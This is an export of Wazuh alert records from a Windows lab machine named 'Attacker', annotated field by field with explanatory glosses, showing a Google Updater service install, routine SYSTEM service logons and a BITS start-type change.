data.win.system.eventID: 7045 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:59.3145318Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2915 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "A service was installed in the system.
Service Name: Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0)
Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceName: Google Updater Internal Service (GoogleUpdaterInternalService137.0.7129.0) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.imagePath: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceType: user mode service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.startType: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.accountName: LocalSystem No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533892.146887 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:43:28.0949229Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43488 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533892.154225 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:43:57.0508466Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43490 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.161563 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:44:30.2946918Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2922 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.163375 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:48:03.2396185Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43492 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.170713 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:16.7140388Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43494 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.178051 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:25.8978248Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43496 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
